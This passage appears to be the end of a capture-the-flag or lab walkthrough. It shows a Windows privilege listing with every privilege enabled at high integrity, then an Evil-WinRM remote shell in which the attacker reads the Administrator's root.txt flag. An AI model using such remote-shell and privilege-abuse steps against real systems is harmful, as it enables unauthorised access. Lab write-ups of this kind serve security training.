NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
*Evil-WinRM* PS C:\Users\pentest\Documents> cd ..\..\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/11/2026 3:47 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
d88bf88fef93a6b8a426066c1b794bba
```
